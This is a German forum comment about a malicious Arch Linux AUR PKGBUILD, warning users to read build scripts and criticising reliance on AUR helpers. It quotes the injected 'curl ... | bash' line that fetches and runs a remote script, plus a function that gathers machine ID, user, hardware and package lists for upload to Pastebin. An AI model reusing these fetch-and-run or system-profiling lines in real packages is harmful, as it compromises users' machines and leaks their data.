Avatar von Ryazor
  • Ryazor

mehr als 1000 Beiträge seit 13.05.2006

Weitere Infos inside

Das Tampering ist vor zwei Tagen auf Reddit publik geworden:
https://www.reddit.com/r/archlinux/comments/8x0p5z/reminder_to_always_read_your_pkgbuilds/

So wurde im PKGBUILD ein Shell Script eingeschleust:

curl -s https://ptpb.pw/~x|bash -&

Dieses Script wiederum wollte eine Systemd Unit installieren, die ein weiteres Script nachläd (~u), das mit Hilfe folgender Funktion Systeminfos ausliest:

full_log() { echo ${MACHINE_ID} cmd_log date '+%s' cmd_log uname -a cmd_log id cmd_log lscpu cmd_log pacman -Qeq cmd_log pacman -Qdq cmd_log systemctl list-units }

Witzig dabei ist, dass der Autor offenbar nicht imstande war, das Script vernünftig zu schreiben oder gar zu testen, denn die Upload-Funktion nach Pastebin hat nicht funktioniert. Des weiteren ist der API Key für Pastebin im Klartext im Script. Alles in Allem handelt es sich also um ein Scriptkiddy, welches (zum Glück) außer einem Schmunzeln nichts wirklich anrichten konnte.

Was nicht so witzig ist: Die Codezeile im PKGBUILD wurde erfolgreich eingeschleust und kann (und wird vermutlich) cleverere Nachahmer finden. Es heißt zwar immer, man soll seine PKGBUILDs lesen und selbst mit makepkg bauen, aber ich kenne keinen Arch User, der keinen AUR Helper nutzt. Es bedarf hier meiner Meinung nach ein besseres Konzept um so etwas in Zukunft zu unterbinden.

Gruß, R.

Bewerten
- +
Anzeige